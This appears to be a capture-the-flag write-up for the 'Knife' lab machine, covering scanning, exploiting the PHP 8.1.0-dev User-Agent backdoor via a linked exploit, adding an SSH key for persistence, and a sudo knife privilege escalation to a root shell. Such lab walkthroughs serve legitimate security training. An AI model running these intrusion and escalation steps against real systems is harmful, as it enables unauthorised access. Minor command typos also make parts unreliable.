# Knife

## Nmap

```
sudo nmap 10.10.10.242 -p- -sS -sV

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Port 80 being the only realistic path ahead we view the root page.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FZQ88vNYksQY9jJpVo5xA%2Fimage.png?alt=media\&token=21b13876-5275-4922-ac13-5232586e94c7)

We find the page is largely unusable. Running `nikto` against the target web server we see very little useful information.

```
nikto -h http://10.10.10.242
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F8M4Ub2iyZAEvD1JI7R3t%2Fimage.png?alt=media\&token=7b359cdb-d499-404b-a172-1df84e8b10a7)

Running `feroxbuster` against that host we see no interesting found files or directories. However, we are running PHP as per `/index.php.`

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fla0Fn4LzQWljzNdAcTgJ%2Fimage.png?alt=media\&token=652d1ee5-05cf-42ed-887e-3716116daa3a)

Running the web server against ZAP we see HTTP headers return the web server running on `PHP/8.1.0-dev`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FqkJmwKHpf4xX8rDNCfsx%2Fimage.png?alt=media\&token=722346d1-0587-46d6-b525-9ba073189ca1)

A quick Google search for this version of `PHP` immediately shows exploit code for this version.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fw7wOqOF1UXNo5XstVVBS%2Fimage.png?alt=media\&token=cce60bef-d56d-473c-aa18-e8899e83f5bf)

From here the first link for exploit-db.com shows us some exploit code and references for the exploit.

**Exploit-DB:** <https://www.exploit-db.com/exploits/49933>

**Blog:** <https://flast101.github.io/php-8.1.0-dev-backdoor-rce/>

**Description**

An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agent header. The following exploit uses the backdoor to provide a pseudo shell on the host.

Running the exploit and the address of the server when prompted gives us a shell as the user james.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FGdCrvvPR1LkjgsgGqTDU%2Fimage.png?alt=media\&token=fc73733d-b406-41bb-99b3-cd051dc295ab)

Next we notice that in /home/james/.ssh we have id\_rsa files available. We can create an authorized keys file and echo the contents of id\_rsa.pub into the authorized keys file. This will give SSH access without having any knowledge of the user james' password.

```
# Create authorized_keys file
touch authorized_keys

# echo contnets of id_rsa.pub into authorized_keys
echo "<Contents of id_rsa.pub>" > authroized_keys

# Next, copy id_rsa to the attacking system and SSH in as the strapi user.
ssh -i id_rsa james@10.10.10.242
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Ffcw7jv0m4sqkyePt5vr7%2Fimage.png?alt=media\&token=44e7283c-a4b7-4ac4-9783-5e46d3487998)

Once in by SSH we check `sudo -l` for sudo permissions.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FaNcroj11pfEysASCmdFk%2Fimage.png?alt=media\&token=b27ca368-e01d-45e2-8153-a1485a3ff4f0)

We see we can run the knife binary as the user root without specifying a password. Looking at GTFOBins we see this can be used with `sudo` to escalate privileges.

**GTFOBins:** <https://gtfobins.github.io/gtfobins/knife/>

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FDJQ1IxR8v2VIQWdzd8nD%2Fimage.png?alt=media\&token=7fdfed05-4fa5-4d55-8b6f-f5389fcbe6bc)

```
sudo /usr/bin/knife exec -E 'exec "/bin/sh"'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FHygUQmoHnqSXimxvwdh1%2Fimage.png?alt=media\&token=e1ecf86a-1cf2-49c2-9115-c323b6070dad)